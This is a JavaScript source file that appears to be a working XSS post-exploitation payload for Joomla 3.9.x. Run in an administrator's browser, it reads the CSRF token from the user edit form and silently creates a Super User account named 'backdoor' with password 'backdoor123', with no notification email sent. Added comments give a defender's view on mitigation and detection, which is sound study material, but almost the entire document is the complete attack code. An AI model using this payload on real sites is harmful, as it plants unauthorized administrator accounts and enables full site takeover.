/*
Target: Joomla! - tested on 3.9.25 but probably works on older versions
Action: Create a new administrative user with username "backdoor" and password "backdoor123"
Context: Must be executed in the context of an administrator user
*/
// Review notes (defender's view): this is a post-exploitation payload for a script-injection
// (XSS) bug in the Joomla administrator area. It only works because it runs on the Joomla
// origin inside an authenticated administrator's browser: the session cookie is attached
// automatically and the anti-CSRF token can be read from the user edit form. SameSite
// cookies do not help here (the request is same-origin); the control that stops it is
// preventing script injection in the admin context (output encoding, a restrictive CSP).
// Detection: look for a new account being added to group id 8 (see jform[groups][] below)
// via task=user.apply immediately after a GET of the same edit form, with no admin
// interaction, in the web server log and Joomla's user action log.
var joomla_root = ""
var req = new XMLHttpRequest();
// joomla_root is empty, so the URL is site-relative: the script must run on the Joomla origin itself.
var url = joomla_root + "/administrator/index.php?option=com_users&view=user&layout=edit";
// The edit page embeds the anti-CSRF token in an inline JSON blob; this regex captures its value.
// The /g flag makes exec() stateful (lastIndex), which is harmless here because it runs once.
var regex = /"csrf.token":"([^"]*?)"/g;
// Synchronous request (third argument false) so the token is available before the POST body is built.
req.open("GET", url, false);
req.send();
// No error handling: if the page does not contain the token (e.g. the session has expired)
// exec() returns null and this line throws a TypeError.
var token = regex.exec(req.responseText)[1];
req.open("POST", url, true);
// Hand-built multipart body with a fixed boundary; the fields mirror the com_users user edit form.
req.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------40312619018197013893860115245");
// withCredentials only affects cross-origin requests; for this same-origin request the session cookie is sent regardless.
req.withCredentials = true;
var body = "-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[name]\"\r\n" +
"\r\n" +
"backdoor\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[username]\"\r\n" +
"\r\n" +
"backdoor\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[password]\"\r\n" +
"\r\n" +
"backdoor123\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[password2]\"\r\n" +
"\r\n" +
"backdoor123\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[email]\"\r\n" +
"\r\n" +
"backdoor@backdoor.com\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[registerDate]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[lastvisitDate]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[lastResetTime]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[resetCount]\"\r\n" +
"\r\n" +
"0\r\n" +
// sendEmail=0, block=0, requireReset=0: presumably no notification mail is sent and the
// account is usable immediately — which is what makes this quiet for the site owner (verify
// against the com_users form definition).
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[sendEmail]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[block]\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[requireReset]\"\r\n" +
"\r\n" +
"0\r\n" +
// id=0 means "create new" rather than edit an existing user.
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[id]\"\r\n" +
"\r\n" +
"0\r\n" +
// User group id 8 — on a default Joomla install this is presumably the Super Users group;
// confirm against the site's usergroups table before treating it as such in an investigation.
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[groups][]\"\r\n" +
"\r\n" +
"8\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][admin_style]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][admin_language]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][language]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][editor]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"jform[params][timezone]\"\r\n" +
"\r\n" +
"\r\n" +
// task=user.apply is the "save" action of the user edit form.
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"task\"\r\n" +
"\r\n" +
"user.apply\r\n" +
// Anti-CSRF token, sent as a form field whose *name* is the token value and whose value is 1.
"-----------------------------40312619018197013893860115245\r\n" +
"Content-Disposition: form-data; name=\"" + token + "\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------40312619018197013893860115245--\r\n";
// Copy the string into a byte array one char at a time. This is only correct because the body
// is pure ASCII: charCodeAt() values above 0xFF would be truncated by the Uint8Array store.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
// Asynchronous POST; the response is never inspected, so success or failure is not reported.
req.send(new Blob([aBody]));